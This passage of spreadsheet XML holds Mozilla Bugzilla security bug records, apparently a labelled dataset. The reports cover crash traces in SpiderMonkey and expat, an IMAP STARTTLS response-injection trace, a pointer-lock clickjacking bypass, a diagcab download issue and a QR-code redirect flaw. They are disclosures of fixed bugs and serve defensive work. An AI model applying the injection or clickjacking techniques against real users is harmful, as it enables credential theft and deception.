AR=ar sh /home/odroid/trees/mozilla-central/js/src/configure --enable-optimize --disable-debug --enable-profiling --enable-gczeal --enable-debug-symbols --disable-tests --enable-more-deterministic --with-ccache --enable-threadsafe &lt;other NSPR options&gt;
Valgrind shows an invalid read of size 4:
==8340== Invalid read of size 4
==8340==    at 0x1699E4: js::jit::IonBailoutIterator::IonBailoutIterator(js::jit::JitActivationIterator const&amp;, js::jit::BailoutStack*) (Bailouts-arm.cpp:82)
==8340==    by 0xCF5EB: js::jit::Bailout(js::jit::BailoutStack*, js::jit::BaselineBailoutInfo**) (Bailouts.cpp:79)
==8340==    by 0x4841537: ???
==8340==  Address 0xffffffb0 is not stack'd, malloc'd or (recently) free'd
==8340==
==8340==
==8340== Process terminating with default action of signal 11 (SIGSEGV)
==8340==  Access not within mapped region at address 0xFFFFFFB0
==8340==    at 0x1699E4: js::jit::IonBailoutIterator::IonBailoutIterator(js::jit::JitActivationIterator const&amp;, js::jit::BailoutStack*) (Bailouts-arm.cpp:82)
==8340==    by 0xCF5EB: js::jit::Bailout(js::jit::BailoutStack*, js::jit::BaselineBailoutInfo**) (Bailouts.cpp:79)
==8340==    by 0x4841537: ???
s-s and setting sec-critical initially because this looks like a scary ARM crash (plus an invalid read from Valgrind). Setting needinfo? from our ARM gurus.</t>
        </is>
      </c>
      <c r="X3934" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3935">
      <c r="A3935" t="n">
        <v>1236923</v>
      </c>
      <c r="B3935" t="inlineStr">
        <is>
          <t>2016-01-05 06:21:58 -0800</t>
        </is>
      </c>
      <c r="C3935" t="inlineStr">
        <is>
          <t>Heap read out-of-bound and crash in expat 2.1.0</t>
        </is>
      </c>
      <c r="D3935" t="inlineStr">
        <is>
          <t>2024-05-30 09:08:11 -0700</t>
        </is>
      </c>
      <c r="E3935" t="n">
        <v>1</v>
      </c>
      <c r="F3935" t="n">
        <v>1</v>
      </c>
      <c r="G3935" t="n">
        <v>3</v>
      </c>
      <c r="H3935" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3935" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3935" t="inlineStr">
        <is>
          <t>XML</t>
        </is>
      </c>
      <c r="K3935" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3935" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3935" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3935" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3935" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3935" t="inlineStr">
        <is>
          <t>[adv-main48+] RedHat CVE-2016-0718 Embargo until May 17, 2016 21:00 UTC+2 (noon PDT)</t>
        </is>
      </c>
      <c r="Q3935" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3935" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3935" t="inlineStr">
        <is>
          <t>mozilla49</t>
        </is>
      </c>
      <c r="T3935" t="n">
        <v>1</v>
      </c>
      <c r="U3935" t="n">
        <v>0</v>
      </c>
      <c r="V3935" t="n">
        <v>52</v>
      </c>
      <c r="W3935" t="inlineStr">
        <is>
          <t>Created attachment 8704150
overflow.xml
User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0
Build ID: 20151210085006
Steps to reproduce:
A read out-of-bound in the heap was detected in expat 2.1.0 (tested in Ubuntu 14.04). There is no crash in Firefox opening the xml, but I don't know if this affect the expat code in the Mozilla repositories anyway.
Actual results:
$ xmlwf overflow.xml
==16291== ERROR: AddressSanitizer: heap-buffer-overflow on address 0xb5a03e80 at pc 0x81021d0 bp 0xbfffeb48 sp 0xbfffeb3c
READ of size 1 at 0xb5a03e80 thread T0
    #0 0x81021cf (/home/vagrant/afl-tests/progs/expat-2.1.0/xmlwf/xmlwf+0x81021cf)
    #1 0x8068791 (/home/vagrant/afl-tests/progs/expat-2.1.0/xmlwf/xmlwf+0x8068791)
    #2 0x80a1f61 (/home/vagrant/afl-tests/progs/expat-2.1.0/xmlwf/xmlwf+0x80a1f61)
    #3 0x80c88a2 (/home/vagrant/afl-tests/progs/expat-2.1.0/xmlwf/xmlwf+0x80c88a2)
    #4 0x80edd44 (/home/vagrant/afl-tests/progs/expat-2.1.0/xmlwf/xmlwf+0x80edd44)
    #5 0x8051f89 (/home/vagrant/afl-tests/progs/expat-2.1.0/xmlwf/xmlwf+0x8051f89)
    #6 0x805299d (/home/vagrant/afl-tests/progs/expat-2.1.0/xmlwf/xmlwf+0x805299d)
    #7 0x8052327 (/home/vagrant/afl-tests/progs/expat-2.1.0/xmlwf/xmlwf+0x8052327)
    #8 0x804a6df (/home/vagrant/afl-tests/progs/expat-2.1.0/xmlwf/xmlwf+0x804a6df)
    #9 0xb6851a82 (/lib/i386-linux-gnu/libc-2.19.so+0x19a82)
    #10 0x804b755 (/home/vagrant/afl-tests/progs/expat-2.1.0/xmlwf/xmlwf+0x804b755)
0xb5a03e80 is located 0 bytes to the right of 2048-byte region [0xb5a03680,0xb5a03e80)
allocated by thread T0 here:
    #0 0xb69fc854 (/usr/lib/i386-linux-gnu/libasan.so.0.0.0+0x16854)
    #1 0x80eee06 (/home/vagrant/afl-tests/progs/expat-2.1.0/xmlwf/xmlwf+0x80eee06)
Shadow bytes around the buggy address:
  0x36b40780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x36b40790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x36b407a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x36b407b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x36b407c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=&gt;0x36b407d0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x36b407e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x36b407f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x36b40800: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x36b40810: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x36b40820: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:     fa
  Heap righ redzone:     fb
  Freed Heap region:     fd
  Stack left redzone:    f1
  Stack mid redzone:     f2
  Stack right redzone:   f3
  Stack partial redzone: f4
  Stack after return:    f5
  Stack use after scope: f8
  Global redzone:        f9
  Global init order:     f6
  Poisoned by user:      f7
  ASan internal:         fe
==16291== ABORTING
Program received signal SIGABRT, Aborted.
0xb7fdd428 in __kernel_vsyscall ()
(gdb) bt
#0  0xb7fdd428 in __kernel_vsyscall ()
#1  0xb6866607 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
#2  0xb6869a33 in __GI_abort () at abort.c:89
#3  0xb6a042e4 in ?? () from /usr/lib/i386-linux-gnu/libasan.so.0
#4  0xb69f858a in ?? () from /usr/lib/i386-linux-gnu/libasan.so.0
#5  0xb6a00f4b in ?? () from /usr/lib/i386-linux-gnu/libasan.so.0
#6  0xb69ffd3a in __asan_report_error () from /usr/lib/i386-linux-gnu/libasan.so.0
#7  0xb69f88ff in __asan_report_load1 () from /usr/lib/i386-linux-gnu/libasan.so.0
#8  0x081021d0 in little2_toUtf8 (enc=&lt;optimized out&gt;, fromP=&lt;optimized out&gt;, fromLim=&lt;optimized out&gt;, toP=&lt;optimized out&gt;, toLim=&lt;optimized out&gt;)
    at lib/xmltok.c:620
#9  0x08068792 in poolAppend (end=0xb5a038e7 "", ptr=0xb5a038d4 "a", enc=0x816caa0 &lt;little2_encoding&gt;, pool=0xb6003f90) at lib/xmlparse.c:6170
#10 poolStoreString (pool=0xb6003f90, enc=0x816caa0 &lt;little2_encoding&gt;, ptr=&lt;optimized out&gt;, end=0xb5a038e7 "") at lib/xmlparse.c:6220
#11 0x080a1f62 in doProlog (parser=parser@entry=0xb6603c80, enc=0x816caa0 &lt;little2_encoding&gt;, s=0xb5a038d4 "a", s@entry=0xb5a03680 "\377\376&lt;",
    end=end@entry=0xb5a038e7 "", tok=&lt;optimized out&gt;, tok@entry=14, next=&lt;optimized out&gt;, nextPtr=nextPtr@entry=0xb6603c98, haveMore=&lt;optimized out&gt;)
    at lib/xmlparse.c:4293
#12 0x080c88a3 in prologProcessor (nextPtr=0xb6603c98, end=0xb5a038e7 "", s=0xb5a03680 "\377\376&lt;", parser=0xb6603c80) at lib/xmlparse.c:3758
#13 prologInitProcessor (parser=0xb6603c80, s=0xb5a03680 "\377\376&lt;", end=0xb5a038e7 "", nextPtr=0xb6603c98) at lib/xmlparse.c:3575
#14 0x080edd45 in XML_ParseBuffer (parser=0xb6603c80, len=615, isFinal=1) at lib/xmlparse.c:1651
#15 0x080efbd8 in XML_Parse (parser=parser@entry=0xb6603c80, s=0x267 &lt;error: Cannot access memory at address 0x267&gt;, s@entry=0xb7fd2000 "\377\376&lt;",
    len=1, len@entry=615, isFinal=isFinal@entry=1) at lib/xmlparse.c:1617
#16 0x08051f8a in processFile (data=data@entry=0xb7fd2000, size=size@entry=615, filename=filename@entry=0xbffff829 "overflow.xml", args=0xbffff540)
    at xmlwf/xmlfile.c:82
#17 0x0805299e in filemap (name=name@entry=0xbffff829 "overflow.xml", processor=processor@entry=0x8051ea0 &lt;processFile&gt;, arg=arg@entry=0xbffff540)
    at xmlwf/unixfilemap.c:61
#18 0x08052328 in XML_ProcessFile (parser=parser@entry=0xb6603c80, filename=0xbffff829 "overflow.xml", flags=flags@entry=1) at xmlwf/xmlfile.c:238
#19 0x0804a6e0 in main (argc=2, argv=0xbffff6c4) at xmlwf/xmlwf.c:847
If you try to continue the execution of xmlwf, it will usually crash. 
Expected results:
Parsing XML shouldn't perform any memory unsafe operations.</t>
        </is>
      </c>
      <c r="X3935" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3936">
      <c r="A3936" t="n">
        <v>1622640</v>
      </c>
      <c r="B3936" t="inlineStr">
        <is>
          <t>2020-03-15 08:35:08 -0700</t>
        </is>
      </c>
      <c r="C3936" t="inlineStr">
        <is>
          <t>IMAP Response Injection when using STARTTLS</t>
        </is>
      </c>
      <c r="D3936" t="inlineStr">
        <is>
          <t>2021-09-13 04:55:04 -0700</t>
        </is>
      </c>
      <c r="E3936" t="n">
        <v>1</v>
      </c>
      <c r="F3936" t="n">
        <v>1</v>
      </c>
      <c r="G3936" t="n">
        <v>2</v>
      </c>
      <c r="H3936" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3936" t="inlineStr">
        <is>
          <t>Thunderbird</t>
        </is>
      </c>
      <c r="J3936" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K3936" t="inlineStr">
        <is>
          <t>68</t>
        </is>
      </c>
      <c r="L3936" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3936" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3936" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3936" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3936" t="inlineStr">
        <is>
          <t>[TM:78.7.0]</t>
        </is>
      </c>
      <c r="Q3936" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3936" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3936" t="inlineStr">
        <is>
          <t>86 Branch</t>
        </is>
      </c>
      <c r="T3936" t="n">
        <v>1</v>
      </c>
      <c r="U3936" t="n">
        <v>0</v>
      </c>
      <c r="V3936" t="n">
        <v>57</v>
      </c>
      <c r="W3936" t="inlineStr">
        <is>
          <t>Created attachment 9133442
response-injection-release.zip
User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:74.0) Gecko/20100101 Firefox/74.0
Steps to reproduce:
Thunderbird has connected to an IMAP server and issued the starttls command. The server responds with "okay, let's start TLS now". However, the server (or some malicious party) also appends extra data after the starttls server response.
Example trace:
    S: * OK [CAPABILITY IMAP4REV1 STARTTLS LOGINDISABLED]\r\n
    C: 1 STARTTLS\r\n
    S: 1 OK start TLS now\r\n* OK [ALERT] Huch?\r\n2 OK ...\r\n4 OK ...\r\n
    ----- &lt;TLS handshake&gt; --- everything after this line is encrypted -----
    C: 2 capability\r\n
    // Thunderbird proceeds with login, as "2 OK" was already received/buffered
    C: 4 login \"alice\" \"password\"\r\n
    // Thunderbird proceeds with list, as "4 OK" was already received/buffered
    C: 5 list \"\" \"*\"\r\n
    ...
Actual results:
Thunderbird shows the alert, and also interprets both results even though they were provided via plaintext (w/o TLS.)
    1 OK start TLS now\r\n* OK [ALERT] Huch?\r\n2 OK ...\r\n4 OK ...\r\n
It seems that when the server answers with multiple results attached directly after "1 OK start TLS now\r\n" response, all following responses are written to an internal buffer first. Only after that, all sockets are switched to speak TLS. However, the old responses are kept and thus end up being interpreted as if they were read via TLS.
This issue was first described by Wietse Venema (www.postfix.org/CVE-2011-0411.html). Theoretically, any other protocols supporting STARTTLS (SMTP, LDAP, ...) could also be affected.
Expected results:
Thunderbird must not interpret the additional data. Arguably, everything after "1 OK start TLS now\r\n" should be interpreted as the SERVER_HELLO TLS message. An easier to implement, but potentially breaking alternative is to discard the data.
Using the additional data allows an attacker to inject malicious responses, which are interpreted as if they came via a secure TLS connection.
I guess that this issue could in one way or another be exploited to obtain sensitive data or be very useful to mount a successful attack on STARTTLS.
Please see the attached test program for a demonstration of the issue.
You will need to provide a a certificate chain and a private key for the leaf certificate. I used the mkcert tool [1] to create a local root CA and issued a certificate for 127.0.0.1.
Thunderbird is configured as follows:
IMAP: 127.0.0.1:10143 (STARTTLS)
SMTP: 127.0.0.1:10587 (STARTTLS)
To make testing easier, the provided example server also implements the minimum SMTP functionality to pass thunderbirds account wizard. Thus, you can setup a fresh thunderbird profile (-ProfileManager) for testing. 
[1] https://github.com/FiloSottile/mkcert</t>
        </is>
      </c>
      <c r="X3936" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3937">
      <c r="A3937" t="n">
        <v>1876675</v>
      </c>
      <c r="B3937" t="inlineStr">
        <is>
          <t>2024-01-25 22:13:08 -0800</t>
        </is>
      </c>
      <c r="C3937" t="inlineStr">
        <is>
          <t>Clickjacking to allow permission  (bypass of 1863083)</t>
        </is>
      </c>
      <c r="D3937" t="inlineStr">
        <is>
          <t>2024-09-16 00:26:55 -0700</t>
        </is>
      </c>
      <c r="E3937" t="n">
        <v>1</v>
      </c>
      <c r="F3937" t="n">
        <v>1</v>
      </c>
      <c r="G3937" t="n">
        <v>3</v>
      </c>
      <c r="H3937" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3937" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J3937" t="inlineStr">
        <is>
          <t>PopupNotifications and Notification Bars</t>
        </is>
      </c>
      <c r="K3937" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3937" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3937" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3937" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3937" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3937" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main124+][adv-esr115.9+]</t>
        </is>
      </c>
      <c r="Q3937" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3937" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S3937" t="inlineStr">
        <is>
          <t>125 Branch</t>
        </is>
      </c>
      <c r="T3937" t="n">
        <v>1</v>
      </c>
      <c r="U3937" t="n">
        <v>0</v>
      </c>
      <c r="V3937" t="n">
        <v>34</v>
      </c>
      <c r="W3937" t="inlineStr">
        <is>
          <t>Created attachment 9376574
bypassclickjacking.html
I found a clickjacking vulnerability , bypass on https://bugzilla.mozilla.org/show_bug.cgi?id=1863083. in 1863083 it has been fixed, namely that when the cursor and permissions are in the same coordinates, the cursor cannot be clicked until the cursor is moved. I bypassed it by using pointerlock before the permission prompt appeared for a moment then did pointerlock (cursor disappeared) then it appeared again then clickjacking occurred.
I tested on Firefox version 120.0b4 (64-bit)
steps to reproduce:
1. open bypassclickjacking.html
2. do many clicks on "click here" button with more 200ms delay
Operating System : Windows 10
Firefox version : Firefox developer version 123.0b2 (64-bit)</t>
        </is>
      </c>
      <c r="X3937" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3938">
      <c r="A3938" t="n">
        <v>1292534</v>
      </c>
      <c r="B3938" t="inlineStr">
        <is>
          <t>2016-08-05 05:53:14 -0700</t>
        </is>
      </c>
      <c r="C3938" t="inlineStr">
        <is>
          <t>flex: buffer overflow in generated code</t>
        </is>
      </c>
      <c r="D3938" t="inlineStr">
        <is>
          <t>2017-10-26 19:12:50 -0700</t>
        </is>
      </c>
      <c r="E3938" t="n">
        <v>1</v>
      </c>
      <c r="F3938" t="n">
        <v>1</v>
      </c>
      <c r="G3938" t="n">
        <v>3</v>
      </c>
      <c r="H3938" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3938" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3938" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K3938" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3938" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3938" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3938" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3938" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3938" t="inlineStr">
        <is>
          <t>[gfx-noted][adv-main53+][adv-esr52.1+][adv-esr45.9+]</t>
        </is>
      </c>
      <c r="Q3938" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3938" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3938" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T3938" t="n">
        <v>1</v>
      </c>
      <c r="U3938" t="n">
        <v>0</v>
      </c>
      <c r="V3938" t="n">
        <v>36</v>
      </c>
      <c r="W3938" t="inlineStr">
        <is>
          <t>Created attachment 8778238
mozilla-flex_buffer_overrun.patch
http://seclists.org/oss-sec/2016/q3/163
CVE-2016-6354
Some versions of The Fast Lexical Analyzer contain a bug which causes it to produce code potentially vulnerable to a buffer overrun.
While the fix should be made upstream (CMU Sphinx and ANGLE) in the first place, it might be a good idea to apply this hotfix for now.</t>
        </is>
      </c>
      <c r="X3938" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3939">
      <c r="A3939" t="n">
        <v>1837675</v>
      </c>
      <c r="B3939" t="inlineStr">
        <is>
          <t>2023-06-09 12:52:10 -0700</t>
        </is>
      </c>
      <c r="C3939" t="inlineStr">
        <is>
          <t>Diagcab file extension = Executable files may contain viruses or other malicious code</t>
        </is>
      </c>
      <c r="D3939" t="inlineStr">
        <is>
          <t>2024-05-30 11:10:40 -0700</t>
        </is>
      </c>
      <c r="E3939" t="n">
        <v>1</v>
      </c>
      <c r="F3939" t="n">
        <v>1</v>
      </c>
      <c r="G3939" t="n">
        <v>2</v>
      </c>
      <c r="H3939" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3939" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3939" t="inlineStr">
        <is>
          <t>File Handling</t>
        </is>
      </c>
      <c r="K3939" t="inlineStr">
        <is>
          <t>Firefox 115</t>
        </is>
      </c>
      <c r="L3939" t="inlineStr">
        <is>
          <t>Desktop</t>
        </is>
      </c>
      <c r="M3939" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N3939" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3939" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3939" t="inlineStr">
        <is>
          <t>[adv-main115+][adv-esr102.13+]</t>
        </is>
      </c>
      <c r="Q3939" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3939" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S3939" t="inlineStr">
        <is>
          <t>116 Branch</t>
        </is>
      </c>
      <c r="T3939" t="n">
        <v>1</v>
      </c>
      <c r="U3939" t="n">
        <v>0</v>
      </c>
      <c r="V3939" t="n">
        <v>30</v>
      </c>
      <c r="W3939" t="inlineStr">
        <is>
          <t>Created attachment 9338350
Firefox POC.mp4
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.42
Steps to reproduce:
Create Diagcab file. 
Download In Firefox Browser And Open From Firefox Browser 
No " Executable files may contain viruses or other malicious code that could harm your computer "
Actual results:
Diagcab File Comes Under harmful files. 
Diagcab file extension Should Be blocklisted to prevent users To Open Directly from Firefox Browser 
Diagcab file extension Leads to One-Click Exploits in Windows
This File is Already Blocklisted In Chrome &amp; Edge Browsers</t>
        </is>
      </c>
      <c r="X3939" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3940">
      <c r="A3940" t="n">
        <v>1837916</v>
      </c>
      <c r="B3940" t="inlineStr">
        <is>
          <t>2023-06-11 23:19:50 -0700</t>
        </is>
      </c>
      <c r="C3940" t="inlineStr">
        <is>
          <t>Firefox for iOS QR Code Scanner does not show the URL for user confirmation before opening it</t>
        </is>
      </c>
      <c r="D3940" t="inlineStr">
        <is>
          <t>2024-08-05 12:29:06 -0700</t>
        </is>
      </c>
      <c r="E3940" t="n">
        <v>1</v>
      </c>
      <c r="F3940" t="n">
        <v>1</v>
      </c>
      <c r="G3940" t="n">
        <v>2</v>
      </c>
      <c r="H3940" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3940" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J3940" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3940" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3940" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3940" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N3940" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3940" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3940" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?]</t>
        </is>
      </c>
      <c r="Q3940" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3940" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S3940" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3940" t="n">
        <v>1</v>
      </c>
      <c r="U3940" t="n">
        <v>0</v>
      </c>
      <c r="V3940" t="n">
        <v>29</v>
      </c>
      <c r="W3940" t="inlineStr">
        <is>
          <t>The QR Code Scanner feature in the Firefox iOS app is vulnerable to an open redirect attack. This vulnerability allows an attacker to redirect users to malicious websites or URLs, potentially leading to phishing attacks or the disclosure of sensitive information.
## Steps To Reproduce:
1. Launch the Firefox iOS app.
2. Navigate the QR code scanner in the Home page search bar (Top Right Side)
3. Scan a QR code that contains a specially crafted URL with an external domain.
4. Create a QR Code with a specially crafted URL using https://www.the-qrcode-generator.com/
5. Scan a QR code that contains a specially crafted URL with an external domain.
6. Observe that the app redirects to the external domain without proper validation or user consent
## Fix:
- The QR Code Scanner should validate the URL before redirecting users.
- Implement proper input validation and URL verification in the QR Code Scanner feature to prevent open redirect vulnerabilities.
- Apply the same fix for iOS and Android
## Impact:
- This vulnerability could be exploited by attackers to trick users into visiting malicious websites, potentially leading to the theft of personal information, financial fraud, or other security risks.
## Supporting materials/ references:
- https://hackerone.com/reports/1946534</t>
        </is>
      </c>
      <c r="X3940" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3941">
      <c r="A3941" t="n">
        <v>670319</v>
      </c>
      <c r="B3941" t="inlineStr">
        <is>
          <t>2011-07-09 00:02:30 -0700</t>
        </is>
      </c>
      <c r="C3941" t="inlineStr">
        <is>
          <t>"ASSERTION: function object has parent of unknown class"</t>
        </is>
      </c>
      <c r="D3941" t="inlineStr">
        <is>
          <t>2012-01-19 10:46:58 -0800</t>
        </is>
      </c>
      <c r="E3941" t="n">
        <v>1</v>
      </c>
      <c r="F3941" t="n">
        <v>1</v>
      </c>
      <c r="G3941" t="n">
        <v>3</v>
      </c>
      <c r="H3941" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3941" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3941" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K3941" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3941" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3941" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3941" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3941" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3941" t="inlineStr">
        <is>
          <t>[sg:critical?][qa-]</t>
        </is>
      </c>
      <c r="Q3941" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3941" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3941" t="inlineStr">
        <is>
          <t>mozilla9</t>
        </is>
      </c>
      <c r="T3941" t="n">
        <v>1</v>
      </c>
      <c r="U3941" t="n">
        <v>0</v>
      </c>
      <c r="V3941" t="n">
        <v>14</v>
      </c>
      <c r="W3941" t="inlineStr">
        <is>
          <t>Created attachment 544955
testcase (asserts fatally when loaded)
###!!! ASSERTION: function object has parent of unknown class!: 'Error', file js/src/xpconnect/src/xpcwrappednative.cpp, line 1759
###!!! ABORT: should have a slim wrapper: '!mFlattenedJSObject || IS_SLIM_WRAPPER(mFlattenedJSObject)', file js/src/xpconnect/src/xpccallcontext.cpp, line 199
Doesn't crash in opt. But the messages are scary, so security-sensitive for now.</t>
        </is>
      </c>
      <c r="X3941" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3942">
      <c r="A3942" t="n">
        <v>569843</v>
      </c>
      <c r="B3942" t="inlineStr">
        <is>
          <t>2010-06-03 08:41:05 -0700</t>
        </is>
      </c>
      <c r="C3942" t="inlineStr">
        <is>
          <t>TM: "Assertion failure: tracecx-&gt;bailExit," with e4x, delete</t>
        </is>
      </c>
      <c r="D3942" t="inlineStr">
        <is>
          <t>2013-01-14 08:44:46 -0800</t>
        </is>
      </c>
      <c r="E3942" t="n">
        <v>1</v>
      </c>
      <c r="F3942" t="n">
        <v>1</v>
      </c>
      <c r="G3942" t="n">
        <v>3</v>
      </c>
      <c r="H3942" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3942" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3942" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3942" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3942" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3942" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3942" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3942" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3942" t="inlineStr">
        <is>
          <t>fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q3942" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3942" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3942" t="inlineStr">
        <is>
          <t>mozilla1.9.3a5</t>
        </is>
      </c>
      <c r="T3942" t="n">
        <v>1</v>
      </c>
      <c r="U3942" t="n">
        <v>0</v>
      </c>
      <c r="V3942" t="n">
        <v>8</v>
      </c>
      <c r="W3942" t="inlineStr">
        <is>
          <t>x = &lt;x/&gt;
for each(l in [0, 0, 0, 0]) {
    delete x.d
}
asserts js debug shell on TM tip with -j at Assertion failure: tracecx-&gt;bailExit, at ../jstracer.cpp:7690</t>
        </is>
      </c>
      <c r="X3942" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3943">
      <c r="A3943" t="n">
        <v>1762520</v>
      </c>
      <c r="B3943" t="inlineStr">
        <is>
          <t>2022-03-31 20:02:51 -0700</t>
        </is>
      </c>
